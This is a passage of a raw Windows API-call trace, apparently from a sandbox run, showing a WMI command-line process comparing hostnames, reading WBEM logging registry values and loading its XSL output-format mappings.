dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0130.541] lstrlenW (lpString="LOCALHOST") returned 9 [0130.541] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.541] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0130.541] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.541] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.541] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0130.541] free (_Block=0x376700) [0130.541] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.542] malloc (_Size=0x14) returned 0x376700 [0130.542] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.542] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.542] malloc (_Size=0x14) returned 0x376770 [0130.542] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.542] malloc (_Size=0x8) returned 0x376790 [0130.542] malloc (_Size=0x18) returned 0x3767b0 [0130.542] malloc (_Size=0x30) returned 0x3767d0 [0130.542] malloc (_Size=0x18) returned 0x376810 [0130.542] SysStringLen (param_1="IDENTIFY") returned 0x8 [0130.542] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0130.542] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0130.542] SysStringLen (param_1="IDENTIFY") returned 0x8 [0130.542] malloc (_Size=0x30) returned 0x376830 [0130.542] malloc (_Size=0x18) returned 0x376870 [0130.542] SysStringLen (param_1="IMPERSONATE") returned 0xb [0130.542] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0130.542] SysStringLen (param_1="IMPERSONATE") returned 0xb [0130.543] SysStringLen (param_1="IDENTIFY") returned 0x8 [0130.543] SysStringLen (param_1="IDENTIFY") returned 0x8 [0130.543] SysStringLen (param_1="IMPERSONATE") returned 0xb [0130.543] malloc (_Size=0x30) returned 0x376890 [0130.543] malloc (_Size=0x18) returned 0x3768d0 [0130.543] SysStringLen (param_1="DELEGATE") returned 0x8 [0130.543] SysStringLen (param_1="IDENTIFY") returned 0x8 [0130.543] SysStringLen (param_1="DELEGATE") returned 0x8 [0130.543] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0130.543] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0130.543] SysStringLen (param_1="DELEGATE") returned 0x8 [0130.543] malloc (_Size=0x30) returned 0x3768f0 [0130.543] malloc (_Size=0x18) returned 0x376930 [0130.543] malloc (_Size=0x30) returned 0x376950 [0130.543] malloc (_Size=0x18) returned 0x376990 [0130.543] SysStringLen (param_1="NONE") returned 0x4 [0130.543] SysStringLen (param_1="DEFAULT") returned 0x7 [0130.543] SysStringLen (param_1="DEFAULT") returned 0x7 [0130.543] SysStringLen (param_1="NONE") returned 0x4 [0130.543] malloc (_Size=0x30) returned 0x3769b0 [0130.543] malloc (_Size=0x18) returned 0x3769f0 [0130.543] SysStringLen (param_1="CONNECT") returned 0x7 [0130.543] SysStringLen (param_1="DEFAULT") returned 0x7 [0130.543] malloc (_Size=0x30) returned 0x376a10 [0130.543] malloc (_Size=0x18) returned 0x376a50 [0130.544] SysStringLen (param_1="CALL") returned 0x4 [0130.544] SysStringLen (param_1="DEFAULT") returned 0x7 [0130.544] SysStringLen (param_1="CALL") returned 0x4 [0130.544] SysStringLen (param_1="CONNECT") returned 0x7 [0130.544] malloc (_Size=0x30) returned 0x376a70 [0130.544] malloc (_Size=0x18) returned 0x376ab0 [0130.544] SysStringLen (param_1="PKT") returned 0x3 [0130.544] SysStringLen (param_1="DEFAULT") returned 0x7 [0130.544] SysStringLen (param_1="PKT") returned 0x3 [0130.544] SysStringLen (param_1="NONE") returned 0x4 [0130.544] SysStringLen (param_1="NONE") returned 0x4 [0130.544] SysStringLen (param_1="PKT") returned 0x3 [0130.544] malloc (_Size=0x30) returned 0x376ad0 [0130.544] malloc (_Size=0x18) returned 0x376b10 [0130.544] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0130.544] SysStringLen (param_1="DEFAULT") returned 0x7 [0130.544] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0130.544] SysStringLen (param_1="NONE") returned 0x4 [0130.544] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0130.544] SysStringLen (param_1="PKT") returned 0x3 [0130.544] SysStringLen (param_1="PKT") returned 0x3 [0130.544] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0130.545] malloc (_Size=0x30) returned 0x378000 [0130.545] malloc (_Size=0x18) returned 0x376f30 [0130.545] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0130.545] SysStringLen (param_1="DEFAULT") returned 0x7 [0130.545] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0130.545] SysStringLen (param_1="PKT") returned 0x3 [0130.545] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0130.545] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0130.546] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0130.546] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0130.546] malloc (_Size=0x30) returned 0x378040 [0130.546] malloc (_Size=0x40) returned 0x376f50 [0130.546] malloc (_Size=0x20a) returned 0x378fd0 [0130.546] GetSystemDirectoryW (in: lpBuffer=0x378fd0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0130.546] free (_Block=0x378fd0) [0130.546] malloc (_Size=0x18) returned 0x376fa0 [0130.546] malloc (_Size=0x18) returned 0x378fd0 [0130.546] malloc (_Size=0x18) returned 0x378ff0 [0130.546] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0130.546] SysStringLen (param_1="\\wbem\\") returned 0x6 [0130.546] free (_Block=0x376fa0) [0130.547] free (_Block=0x378fd0) [0130.547] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0130.547] free (_Block=0x378ff0) [0130.547] malloc (_Size=0x18) returned 0x376fa0 [0130.547] malloc (_Size=0x18) returned 0x378fd0 [0130.547] malloc (_Size=0x18) returned 0x378ff0 [0130.547] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0130.547] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0130.547] free (_Block=0x376fa0) [0130.547] free (_Block=0x378fd0) [0130.547] GetCurrentThreadId () returned 0xb18 [0130.547] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x26f360 | out: phkResult=0x26f360*=0xf8) returned 0x0 [0130.548] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x26f3b0, lpcbData=0x26f350*=0x400 | out: lpType=0x0, lpData=0x26f3b0*=0x30, lpcbData=0x26f350*=0x4) returned 0x0 [0130.548] _wcsicmp (_String1="0", _String2="1") returned -1 [0130.548] _wcsicmp (_String1="0", _String2="2") returned -2 [0130.548] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x26f350*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x26f350*=0x42) returned 0x0 [0130.548] malloc (_Size=0x86) returned 0x379010 [0130.548] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x379010, lpcbData=0x26f350*=0x42 | out: lpType=0x0, lpData=0x379010*=0x25, lpcbData=0x26f350*=0x42) returned 0x0 [0130.548] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0130.548] malloc (_Size=0x42) returned 0x3790a0 [0130.548] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0130.548] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x26f3b0, lpcbData=0x26f350*=0x400 | out: lpType=0x0, lpData=0x26f3b0*=0x36, lpcbData=0x26f350*=0xc) returned 0x0 [0130.548] _wtol (_String="65536") returned 65536 [0130.548] free (_Block=0x379010) [0130.548] RegCloseKey (hKey=0x0) returned 0x6 [0130.548] CoCreateInstance (in: rclsid=0xff417410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff4173f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x26f858 | out: ppv=0x26f858*=0x21471d0) returned 0x0 [0131.710] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x21471d0, xmlSource=0x26f9a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x376fa0), isSuccessful=0x26fa10 | out: isSuccessful=0x26fa10*=0xffff) returned 0x0 [0139.014] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x21471d0, DOMElement=0x26f850 | out: DOMElement=0x26f850*=0x214bc50) returned 0x0 [0139.015] malloc (_Size=0x18) returned 0x37b810 [0139.015] IXMLDOMElement:getElementsByTagName (in: This=0x214bc50, tagName="XSLFORMAT", resultList=0x26f860 | out: resultList=0x26f860*=0x2149cc0) returned 0x0 [0139.017] free (_Block=0x37b810) [0139.017] IXMLDOMNodeList:get_length (in: This=0x2149cc0, listLength=0x26fa28 | out: listLength=0x26fa28*=21) returned 0x0 [0139.018] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=0, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.018] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="texttable.xsl") returned 0x0 [0139.018] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.018] malloc (_Size=0x18) returned 0x37b810 [0139.018] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.019] free (_Block=0x37b810) [0139.019] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x2)) returned 0x0 [0139.019] malloc (_Size=0x18) returned 0x37b810 [0139.019] malloc (_Size=0x18) returned 0x37b830 [0139.019] malloc (_Size=0x30) returned 0x378080 [0139.019] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.019] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.019] IUnknown:Release (This=0x214a280) returned 0x0 [0139.019] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=1, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.020] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="textvaluelist.xsl") returned 0x0 [0139.020] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.020] malloc (_Size=0x18) returned 0x37b850 [0139.020] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.020] free (_Block=0x37b850) [0139.020] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x2)) returned 0x0 [0139.020] malloc (_Size=0x18) returned 0x37b850 [0139.020] malloc (_Size=0x18) returned 0x37b870 [0139.020] SysStringLen (param_1="VALUE") returned 0x5 [0139.020] SysStringLen (param_1="TABLE") returned 0x5 [0139.020] SysStringLen (param_1="TABLE") returned 0x5 [0139.020] SysStringLen (param_1="VALUE") returned 0x5 [0139.020] malloc (_Size=0x30) returned 0x3780c0 [0139.020] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.020] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.020] IUnknown:Release (This=0x214a280) returned 0x0 [0139.020] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=2, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.021] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="textvaluelist.xsl") returned 0x0 [0139.021] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.021] malloc (_Size=0x18) returned 0x37b890 [0139.021] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.021] free (_Block=0x37b890) [0139.021] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x2)) returned 0x0 [0139.021] malloc (_Size=0x18) returned 0x37b890 [0139.021] malloc (_Size=0x18) returned 0x37b8b0 [0139.021] SysStringLen (param_1="LIST") returned 0x4 [0139.021] SysStringLen (param_1="TABLE") returned 0x5 [0139.021] malloc (_Size=0x30) returned 0x378100 [0139.021] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.021] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.021] IUnknown:Release (This=0x214a280) returned 0x0 [0139.021] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=3, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.021] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="rawxml.xsl") returned 0x0 [0139.021] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.021] malloc (_Size=0x18) returned 0x37b8d0 [0139.022] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.022] free (_Block=0x37b8d0) [0139.022] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x2)) returned 0x0 [0139.022] malloc (_Size=0x18) returned 0x37b8d0 [0139.022] malloc (_Size=0x18) returned 0x37b8f0 [0139.022] SysStringLen (param_1="RAWXML") returned 0x6 [0139.022] SysStringLen (param_1="TABLE") returned 0x5 [0139.022] SysStringLen (param_1="RAWXML") returned 0x6 [0139.022] SysStringLen (param_1="LIST") returned 0x4 [0139.022] SysStringLen (param_1="LIST") returned 0x4 [0139.022] SysStringLen (param_1="RAWXML") returned 0x6 [0139.022] malloc (_Size=0x30) returned 0x378140 [0139.023] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.023] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.023] IUnknown:Release (This=0x214a280) returned 0x0 [0139.023] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=4, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.023] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="htable.xsl") returned 0x0 [0139.023] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.023] malloc (_Size=0x18) returned 0x37b910 [0139.023] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.023] free (_Block=0x37b910) [0139.023] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x2)) returned 0x0 [0139.023] malloc (_Size=0x18) returned 0x37b910 [0139.023] malloc (_Size=0x18) returned 0x37b930 [0139.023] SysStringLen (param_1="HTABLE") returned 0x6 [0139.023] SysStringLen (param_1="TABLE") returned 0x5 [0139.023] SysStringLen (param_1="HTABLE") returned 0x6 [0139.023] SysStringLen (param_1="LIST") returned 0x4 [0139.023] malloc (_Size=0x30) returned 0x378180 [0139.024] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.024] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.024] IUnknown:Release (This=0x214a280) returned 0x0 [0139.024] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=5, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.024] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="hform.xsl") returned 0x0 [0139.024] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.024] malloc (_Size=0x18) returned 0x37b950 [0139.024] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.024] free (_Block=0x37b950) [0139.024] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x2)) returned 0x0 [0139.024] malloc (_Size=0x18) returned 0x37b950 [0139.024] malloc (_Size=0x18) returned 0x37b970 [0139.024] SysStringLen (param_1="HFORM") returned 0x5 [0139.024] SysStringLen (param_1="TABLE") returned 0x5 [0139.024] SysStringLen (param_1="HFORM") returned 0x5 [0139.024] SysStringLen (param_1="LIST") returned 0x4 [0139.025] SysStringLen (param_1="HFORM") returned 0x5 [0139.025] SysStringLen (param_1="HTABLE") returned 0x6 [0139.025] malloc (_Size=0x30) returned 0x3781c0 [0139.025] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.025] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.025] IUnknown:Release (This=0x214a280) returned 0x0 [0139.025] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=6, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.025] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="xml.xsl") returned 0x0 [0139.025] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.025] malloc (_Size=0x18) returned 0x37b990 [0139.025] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.025] free (_Block=0x37b990) [0139.025] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x2)) returned 0x0 [0139.025] malloc (_Size=0x18) returned 0x37b990 [0139.025] malloc (_Size=0x18) returned 0x37b9b0 [0139.025] SysStringLen (param_1="XML") returned 0x3 [0139.025] SysStringLen (param_1="TABLE") returned 0x5 [0139.025] SysStringLen (param_1="XML") returned 0x3 [0139.025] SysStringLen (param_1="VALUE") returned 0x5 [0139.026] SysStringLen (param_1="VALUE") returned 0x5 [0139.026] SysStringLen (param_1="XML") returned 0x3 [0139.026] malloc (_Size=0x30) returned 0x378200 [0139.026] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.026] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.026] IUnknown:Release (This=0x214a280) returned 0x0 [0139.026] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=7, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.026] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="mof.xsl") returned 0x0 [0139.026] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.026] malloc (_Size=0x18) returned 0x37b9d0 [0139.026] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.026] free (_Block=0x37b9d0) [0139.026] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x2)) returned 0x0 [0139.026] malloc (_Size=0x18) returned 0x37b9d0 [0139.026] malloc (_Size=0x18) returned 0x37b9f0 [0139.026] SysStringLen (param_1="MOF") returned 0x3 [0139.026] SysStringLen (param_1="TABLE") returned 0x5 [0139.026] SysStringLen (param_1="MOF") returned 0x3 [0139.027] SysStringLen (param_1="LIST") returned 0x4 [0139.027] SysStringLen (param_1="MOF") returned 0x3 [0139.027] SysStringLen (param_1="RAWXML") returned 0x6 [0139.027] SysStringLen (param_1="LIST") returned 0x4 [0139.027] SysStringLen (param_1="MOF") returned 0x3 [0139.027] malloc (_Size=0x30) returned 0x378240 [0139.027] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.027] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.027] IUnknown:Release (This=0x214a280) returned 0x0 [0139.027] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=8, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.027] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="csv.xsl") returned 0x0 [0139.027] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.027] malloc (_Size=0x18) returned 0x37ba10 [0139.027] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.027] free (_Block=0x37ba10) [0139.027] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x2)) returned 0x0 [0139.027] malloc (_Size=0x18) returned 0x37ba10 [0139.027] malloc (_Size=0x18) returned 0x37ba30 [0139.028] SysStringLen (param_1="CSV") returned 0x3 [0139.028] SysStringLen (param_1="TABLE") returned 0x5 [0139.028] SysStringLen (param_1="CSV") returned 0x3 [0139.028] SysStringLen (param_1="LIST") returned 0x4 [0139.028] SysStringLen (param_1="CSV") returned 0x3 [0139.028] SysStringLen (param_1="HTABLE") returned 0x6 [0139.028] SysStringLen (param_1="CSV") returned 0x3 [0139.028] SysStringLen (param_1="HFORM") returned 0x5 [0139.028] malloc (_Size=0x30) returned 0x378280 [0139.028] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.028] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.028] IUnknown:Release (This=0x214a280) returned 0x0 [0139.028] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=9, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.028] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="texttable.xsl") returned 0x0 [0139.028] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.028] malloc (_Size=0x18) returned 0x37ba50 [0139.028] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.028] free (_Block=0x37ba50) [0139.028] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x2)) returned 0x0 [0139.029] malloc (_Size=0x18) returned 0x37ba50 [0139.029] malloc (_Size=0x18) returned 0x37ba70 [0139.029] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.029] SysStringLen (param_1="TABLE") returned 0x5 [0139.029] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.029] SysStringLen (param_1="VALUE") returned 0x5 [0139.029] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.029] SysStringLen (param_1="XML") returned 0x3 [0139.029] SysStringLen (param_1="XML") returned 0x3 [0139.029] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.029] malloc (_Size=0x30) returned 0x3782c0 [0139.029] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.029] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.029] IUnknown:Release (This=0x214a280) returned 0x0 [0139.029] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=10, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.029] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="texttable.xsl") returned 0x0 [0139.029] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.029] malloc (_Size=0x18) returned 0x37ba90 [0139.029] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.030] free (_Block=0x37ba90) [0139.030] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x2)) returned 0x0 [0139.030] malloc (_Size=0x18) returned 0x37ba90 [0139.030] malloc (_Size=0x18) returned 0x37bab0 [0139.030] SysStringLen (param_1="texttablewsys") returned 0xd [0139.030] SysStringLen (param_1="TABLE") returned 0x5 [0139.030] SysStringLen (param_1="texttablewsys") returned 0xd [0139.030] SysStringLen (param_1="XML") returned 0x3 [0139.030] SysStringLen (param_1="texttablewsys") returned 0xd [0139.030] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.030] SysStringLen (param_1="XML") returned 0x3 [0139.030] SysStringLen (param_1="texttablewsys") returned 0xd [0139.030] malloc (_Size=0x30) returned 0x378300 [0139.030] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.030] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.030] IUnknown:Release (This=0x214a280) returned 0x0 [0139.030] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=11, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.030] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="texttable.xsl") returned 0x0 [0139.030] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.030] malloc (_Size=0x18) returned 0x37bad0 [0139.031] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21478d0, name="KEYWORD", namedItem=0x26f848 | out: namedItem=0x26f848*=0x214a280) returned 0x0 [0139.031] free (_Block=0x37bad0) [0139.031] IXMLDOMNode:get_nodeValue (in: This=0x214a280, value=0x26f880 | out: value=0x26f880*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x2)) returned 0x0 [0139.031] malloc (_Size=0x18) returned 0x37bad0 [0139.031] malloc (_Size=0x18) returned 0x37baf0 [0139.031] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0139.031] SysStringLen (param_1="TABLE") returned 0x5 [0139.031] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0139.031] SysStringLen (param_1="XML") returned 0x3 [0139.031] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0139.031] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.031] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0139.031] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0139.031] malloc (_Size=0x30) returned 0x378340 [0139.031] IUnknown:Release (This=0x214bd50) returned 0x0 [0139.031] IUnknown:Release (This=0x21478d0) returned 0x0 [0139.031] IUnknown:Release (This=0x214a280) returned 0x0 [0139.031] IXMLDOMNodeList:get_item (in: This=0x2149cc0, index=12, listItem=0x26f830 | out: listItem=0x26f830*=0x214bd50) returned 0x0 [0139.031] IXMLDOMNode:get_text (in: This=0x214bd50, text=0x26f840 | out: text=0x26f840*="texttable.xsl") returned 0x0 [0139.031] IXMLDOMNode:get_attributes (in: This=0x214bd50, attributeMap=0x26f838 | out: attributeMap=0x26f838*=0x21478d0) returned 0x0 [0139.032] malloc 